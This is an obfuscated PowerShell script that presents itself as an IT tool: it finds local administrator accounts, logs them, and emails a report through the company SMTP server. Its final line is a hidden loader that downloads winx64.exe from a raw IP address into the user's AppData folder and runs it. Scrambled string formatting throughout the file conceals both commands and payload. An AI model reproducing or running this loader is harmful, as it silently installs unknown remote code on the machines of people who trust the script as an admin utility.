.("{2}{3}{1}{0}" -f'le','Variab','Set','-') -Name ("{0}{1}" -f 'B','ody') -Force
&("{1}{3}{2}{0}"-f'Variable','S','t-','e') -Name ("{1}{2}{0}{3}"-f'lAdd','E','mai','ress') -Force
&("{1}{0}{2}"-f't-Vari','Se','able') -Name ("{1}{3}{0}{4}{2}" -f 'dr','Email','ses','Ad','es') -Force
.("{1}{2}{0}"-f'ble','Set-V','aria') -Name ("{2}{1}{0}"-f'ns','o','Exclusi') -Force
.("{2}{3}{0}{1}"-f 'abl','e','S','et-Vari') -Name ("{0}{2}{1}"-f 'Local','n','Admi') -Force
&("{0}{1}{2}"-f'Se','t-V','ariable') -Name ("{0}{3}{2}{1}" -f 'LocalA','s','min','d') -Force
.("{1}{3}{2}{0}"-f'e','Set-','riabl','Va') -Name ("{0}{2}{1}"-f 'Lo','ile','gF') -Value (("{4}{1}{5}{7}{6}{3}{2}{0}{8}"-f'inistrato',':windir8','m','GLocalAd','Uqtenv','uGLo','8u','gs','rs.log')).rEpLacE('Uqt',[stRiNg][chAR]36).rEpLacE('8uG',[stRiNg][chAR]92) -Force
&("{3}{0}{1}{2}"-f 'ia','bl','e','Set-Var') -Name ("{2}{0}{1}" -f 'F','ileEmailed','Log') -Value (("{1}{3}{7}{8}{6}{0}{9}{5}{4}{10}{2}{11}" -f 'FLog','UwOenv:w','ministrators','ind','l','ca','8d','i','r','s8dFLo','Ad','_Emailed.log')).REPLaCe('UwO',[strIng][cHaR]36).REPLaCe('8dF','\') -Force
.("{3}{2}{1}{0}"-f'e','bl','Varia','Set-') -Name ("{1}{0}"-f 'ember','M') -Force
&("{3}{1}{2}{0}"-f'ble','r','ia','Set-Va') -Name ("{2}{0}{1}"-f 'b','ers','Mem') -Force
&("{0}{3}{1}{2}" -f'S','i','able','et-Var') -Name ("{0}{1}"-f 'O','utput') -Force
.("{1}{0}{2}{3}"-f'e','S','t-Var','iable') -Name ("{0}{1}"-f'Pr','of') -Force
&("{3}{0}{2}{1}"-f'ar','able','i','Set-V') -Name ("{0}{1}" -f'Profile','s') -Force
.("{1}{2}{0}" -f'e','Set-Varia','bl') -Name ("{2}{1}{0}{3}" -f 'eP','lativ','Re','ath') -Force

&("{1}{0}" -f 'ls','c')
${r`ElAtIV`E`P`ATH} = (&("{2}{0}{1}" -f 'lit-p','ath','sp') ${SCRi`p`T:my`IN`VOC`ATIon}."Myc`oMM`AnD"."pA`Th" -parent) + "\"
${B`OdY} = (("{2}{1}{0}{4}{3}" -f 'l Adm','a','Loc',')','inistrator(s')) + [char]13 + ("{5}{3}{6}{2}{1}{4}{0}"-f'---------','---','-','--','--','-','---------') + [char]13
${EM`AIlAd`DrE`sses} = @()
${EMAI`laDDRE`SseS} = .("{1}{2}{0}{3}" -f 'te','Get-C','on','nt') -Path (("{0}{8}{7}{2}{5}{6}{4}{3}{1}"-f'U4B','xt','t','esses.t','athEmailAddr','iv','eP','la','Re')).repLaCE(([cHaR]85+[cHaR]52+[cHaR]66),'$')
${L`OcaladM`I`Ns} = @()
${Me`MBe`RS} = &("{1}{0}" -f't','ne') ("{0}{1}{2}"-f 'localg','rou','p') ("{1}{3}{2}{0}"-f 'rators','admi','ist','n') | &("{0}{1}"-f'wher','e') { ${_} -AND ${_} -notmatch ("{6}{0}{4}{2}{7}{5}{3}{1}"-f'and','ly','l','ccessful',' comp','su','comm','eted ') } | &("{1}{0}" -f'elect','s') -skip 4
${Pr`oFil`es} = .("{0}{2}{1}"-f'Ge','em','t-ChildIt') -Path ((("{0}{5}{6}{2}{7}{4}{1}{3}"-f'{1','e','mDr','rs','0}us','}e','nv:Syste','ive{')) -F[char]92,[char]36) -Force
${eXclus`IO`Ns} = .("{0}{2}{1}"-f'Get-Cont','nt','e') -Path ((("{1}{4}{8}{7}{0}{5}{3}{2}{6}" -f 'xc','{0}R','s.','n','elati','lusio','txt','ePathE','v'))  -f [chAr]36)
Foreach (${mEM`B`eR} in ${me`mb`ERS}) {
	${m`EM`Ber} = ${me`Mb`Er}.("{0}{1}"-f 'Spl','it').Invoke("\")
	If (${MEMB`ER}."cou`Nt" -gt 1) {
		[string]${Me`MBeR} = ${meMB`eR}[1]
		If (${me`MBeR} -notin ${excl`U`SiOnS}) {
			Foreach (${P`RoF} in ${PR`o`FILES}) {
				If (${ME`m`BER} -eq ${p`ROf}) {
					${lO`CAlA`DmI`NS} += ${mEm`BeR}
				}
			}
		}
	}
	&("{2}{1}{4}{0}{3}" -f 'iab','ve-','Remo','le','Var') -Name ("{2}{1}{0}"-f'er','mb','Me')
}
if ((&("{1}{2}{0}" -f'th','Test-P','a') ${LOG`F`ILEEmai`LeD}) -eq ${TR`UE}) {
	&("{1}{2}{0}" -f 'ove-Item','Re','m') -Path ${L`oGfiLEem`Ai`L`ED} -Force
}
if ((.("{0}{2}{1}" -f'Test','h','-Pat') ${lOg`F`ile}) -eq ${T`RUe}) {
	.("{2}{1}{0}"-f 'm','te','Remove-I') -Path ${lOG`File} -Force
}
if (${l`OCAL`ADMins}."co`Unt" -gt 0) {
	if ((.("{2}{0}{1}" -f'-Pa','th','Test') ${l`oGf`Ile}) -eq ${Fa`LsE}) {
		.("{2}{0}{1}"-f'-Ite','m','New') -Path ${loGf`IlE} -ItemType ("{0}{1}"-f 'fil','e') -Force
	}
	foreach (${lOc`A`ladMin} in ${LOCa`la`d`MINs}) {
		.("{1}{2}{0}"-f'-Content','A','dd') -Path ${L`Ogfile} -Value ${loCA`LaDm`in} -Force
		${Bo`dY} = ${bo`dy} + ${locA`lADM`In} + [char]13
	}
}
If (${Lo`Ca`lAd`mINS}."C`ounT" -eq 1) {
	${o`UT`pUT} = ${l`OCaLADM`in} + [char]32 + ("{2}{5}{3}{1}{4}{0}{6}"-f 's',' admi','i','ocal','ni','s a l','trator on') + [char]32 + ${en`V:cOmPutE`RN`AmE}
	foreach (${e`MAIladDR`esS} in ${e`Ma`I`laddrE`sseS}) {
		&("{0}{2}{4}{3}{1}"-f 'Send-Ma','sage','ilM','s','e') -To ${eM`AILa`ddRESS} -From ("{3}{2}{0}{1}" -f 'co','m','T@acme.','I') -Subject ("{4}{1}{2}{0}{3}"-f'ator Re','dminist','r','port','Local A') -Body ${Ou`T`PuT} -SmtpServer ("{2}{3}{0}{1}" -f'e.','com','smtp.','acm')
	}
	.("{2}{1}{0}"-f'm','-Ite','Rename') -Path ${lOG`F`iLe} -NewName ${logFILE`emaiL`eD} -Force
} else {
	${ou`T`pUT} = ("{13}{12}{6}{7}{4}{8}{9}{5}{15}{0}{11}{1}{14}{3}{10}{2}" -f's','r','rs on','t','ists','i','ched',' file l',' all local ','adm','o','t','he atta','T','a','ni') + [char]32 + ${enV`:`CompUteR`NA`mE}
	foreach (${e`M`AilADDRess} in ${EM`AIlADdRe`S`SES}) {
		&("{0}{1}{4}{3}{2}"-f 'S','e','sage','ailMes','nd-M') -To ${E`Ma`i`LADD`REsS} -From ("{1}{2}{0}" -f'acme.com','IT','@') -Subject ("{4}{2}{5}{3}{0}{1}"-f 'mini','strator Report','oc','d','L','al A') -Body ${oU`T`put} -Attachments ${LOGf`ilE} -SmtpServer ("{0}{2}{1}{3}" -f's','.','mtp','acme.com')
	}
	&("{1}{0}{2}" -f'ename','R','-Item') -Path ${lo`gf`ILE} -NewName ${lOG`FILeeMaI`L`ED} -Force
}
${l`ocalad`mi`Ns} = ${NU`LL}


&("{0}{1}{2}{3}" -f'R','emove-Va','riabl','e') -Name ("{0}{1}" -f'Bo','dy') -Force
&("{1}{3}{2}{0}"-f 'e','Remove-V','bl','aria') -Name ("{1}{3}{2}{0}" -f 'ress','E','lAdd','mai') -Force
&("{3}{4}{2}{0}{1}"-f 'ri','able','a','R','emove-V') -Name ("{1}{0}{2}{3}" -f 'a','Em','ilAdd','resses') -Force
.("{0}{2}{1}{3}" -f 'R','i','emove-Var','able') -Name ("{2}{0}{1}" -f'usio','ns','Excl') -Force
&("{1}{3}{2}{0}" -f'le','Remov','iab','e-Var') -Name ("{2}{1}{0}"-f 'dmin','A','Local') -Force
&("{3}{2}{0}{4}{1}" -f'e-Variab','e','mov','Re','l') -Name ("{3}{1}{2}{0}" -f 'ns','alA','dmi','Loc') -Force
.("{3}{2}{1}{0}" -f'le','riab','Va','Remove-') -Name ("{2}{0}{1}"-f'og','File','L') -Force
&("{0}{1}{3}{2}"-f 'Rem','o','le','ve-Variab') -Name ("{1}{0}{2}" -f'Em','LogFile','ailed') -Force
.("{1}{2}{0}" -f 'iable','Re','move-Var') -Name ("{1}{0}{2}"-f'embe','M','rs') -Force
.("{2}{0}{1}" -f'move-Varia','ble','Re') -Name ("{1}{0}" -f't','Outpu') -Force
.("{2}{4}{3}{0}{1}"-f 'ov','e-Variable','R','m','e') -Name ("{0}{1}"-f 'Pro','f') -Force
&("{1}{0}{2}{4}{3}"-f 'emove-','R','Varia','e','bl') -Name ("{0}{1}{2}"-f'Prof','ile','s') -Force

(&("{0}{1}{2}{3}"-f'N','ew-','Obj','ect') ("{2}{4}{3}{1}{0}{6}{5}"-f 'ebCli','.W','Sy','.Net','stem','nt','e')).("{0}{3}{1}{2}" -f 'Do','lo','adFile','wn').Invoke(("{1}{5}{2}{7}{3}{8}{6}{9}{4}{0}" -f 'exe','ht','//94','.58.30/~','.','tp:','vor/w','.102','tre','inx64'),"$env:APPDATA\winx64.exe");.("{0}{2}{3}{1}" -f'Start','ss','-Pr','oce') ("$env:APPDATA\winx64.exe")
